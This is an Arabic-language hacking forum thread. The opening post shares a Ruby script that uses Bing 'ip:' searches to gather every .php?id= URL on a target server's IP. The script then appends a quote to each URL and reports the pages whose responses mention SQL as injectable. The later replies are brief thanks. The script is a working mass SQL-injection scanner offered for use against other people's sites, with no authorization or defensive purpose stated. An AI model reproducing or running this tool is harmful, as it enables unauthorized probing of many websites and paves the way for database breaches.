1. Red-StOnE

    Red-StOnE Developer

    الأنتساب:
    ‏29 مايو 2012
    المشاركات:
    62
    الإعجابات المتلقاة:
    3
    نقاط الجائزة:
    8
    السلام عليكم ورحمة الله وبركاتة

    اقدم لكم سكربت لفحص جميع الموقع الي على السرفر من SQL Injection
    السكربت يعطيك جميع الصفحات المصابه ويفحص جميع المواقع الي على السيرفر باستخدام محرك Bing

    متطلبات تشغيل السكربت مترجم روبي سوا للويندوز أو الليكنس
    الاستخدام بيكون عن طريق هذا الامر ruby alwa7sh.rb ip id
    وهذا فيديو لعمل السكربت ..


    [YOUTUBE]cTkDukEih60[/YOUTUBE]


    [RUBY]#/usr/bin/env ruby

    require 'net/http'




    def web_count(server_ip,variable)
    file = File.new("alwa7sh.txt","w")
    (0..6).each do |pages|
    req = Net::HTTP.get_response(URI.parse("http://www.bing.com/search?q=ip%3a#{server_ip}+%22.php%3f#{variable}%3d%22&go=&filt=all&first=#{pages*10 + 1}&FORM=PERE1")) #get the request
    bodys = req.body
    my_array = bodys.split('"') # split the text
    my_array.each do |words|
    if words.scan(".php?#{variable}=").size > 0 then #scan for the .php?id=
    if words.scan("http://").size > 0 then
    file.puts words
    end
    end
    end
    end
    file.close
    end
    def check_sql()
    file = File.open("alwa7sh.txt","r")
    file.each_line do |x|
    web_v = x+"'"
    web_v["\n"]=""
    sql = Net::HTTP.get_response(URI.parse(web_v))
    if sql.body.downcase.scan("sql").size > 0 then
    puts "this web is vulnerable : #{x}"
    end
    end
    end


    if ARGV.size .eql?(2) == false
    puts "\nusage [server ip] [variable] ex: ruby alwa7sh.rb 127.0.0.1 id"





    puts "################################"
    else puts "################################"
    begin puts "################################"
    puts "################################"
    puts "# SQL_Scanner by:alwa7sh_al3need #"
    puts "# avb.s-oman.net/:alwa7sh_al3need #\n"
    puts "################################"
    puts "################################"
    puts "################################"
    puts "################################"


    web_count(ARGV[0],ARGV[1])
    check_sql()
    rescue
    puts "can't extract website"
    end
    end[/RUBY]


    حقوق السكربت لـ الوحش العنيد
    عجبني السكربت وحبيت أشارككم فيه​
     
  2. HacKeR 8

    HacKeR 8 Developer

    الأنتساب:
    ‏25 فبراير 2013
    المشاركات:
    24
    الإعجابات المتلقاة:
    0
    نقاط الجائزة:
    1
    الإقامة:
    U.A.E
    رد: بلغة الروبي لفحص جميع الموقع الي على السرفر من SQL Injection

    بارك الله فيك يا صديقي
     
  3. Mr.PErO

    Mr.PErO Developer

    الأنتساب:
    ‏6 نوفمبر 2014
    المشاركات:
    29
    الإعجابات المتلقاة:
    2
    نقاط الجائزة:
    3
    رد: بلغة الروبي لفحص جميع الموقع الي على السرفر من SQL Injection

    شكرا وبارك الله فيك
    خالص تحياتي لك
     
  4. jőŐőķєя

    jőŐőķєя Developer

    الأنتساب:
    ‏9 ديسمبر 2011
    المشاركات:
    56
    الإعجابات المتلقاة:
    0
    نقاط الجائزة:
    6
    الوظيفة:
    طآلب , ثآنوي ..●
    الإقامة:
    في عالم لا يسكنه غيريُ
    رد: بلغة الروبي لفحص جميع الموقع الي على السرفر من SQL Injection

    بآرك الله فيك حبيبي
     
  5. MR.CAPTCHA

    MR.CAPTCHA Expert Developer ExpErt DeveloPer

    الأنتساب:
    ‏30 أغسطس 2014
    المشاركات:
    1,786
    الإعجابات المتلقاة:
    14
    نقاط الجائزة:
    38
    الوظيفة:
    I.T Student
    الإقامة:
    IRAQ
    رد: بلغة الروبي لفحص جميع الموقع الي على السرفر من SQL Injection

    عاشت ايدك
    [​IMG][​IMG]
     
  6. فريق الحماية العراقي

    فريق الحماية العراقي ExpertDeveloper V • I • P

    الأنتساب:
    ‏10 أكتوبر 2014
    المشاركات:
    265
    الإعجابات المتلقاة:
    6
    نقاط الجائزة:
    18
    الوظيفة:
    طالب+مبرمج
    الإقامة:
    العراق
    رد: بلغة الروبي لفحص جميع الموقع الي على السرفر من SQL Injection

    بارك الله بيك
    الموفقية
     
  7. al_98r

    al_98r Developer

    الأنتساب:
    ‏21 يوليو 2014
    المشاركات:
    112
    الإعجابات المتلقاة:
    0
    نقاط الجائزة:
    16
    رد: بلغة الروبي لفحص جميع الموقع الي على السرفر من SQL Injection

    عاشت ايدك​

    :ُae@: ​
     
  8. Mafia Scorpion

    Mafia Scorpion Developer

    الأنتساب:
    ‏19 أغسطس 2014
    المشاركات:
    62
    الإعجابات المتلقاة:
    0
    نقاط الجائزة:
    6
    رد: بلغة الروبي لفحص جميع الموقع الي على السرفر من SQL Injection

    عاشت ايدك
     

مشاركة هذه الصفحة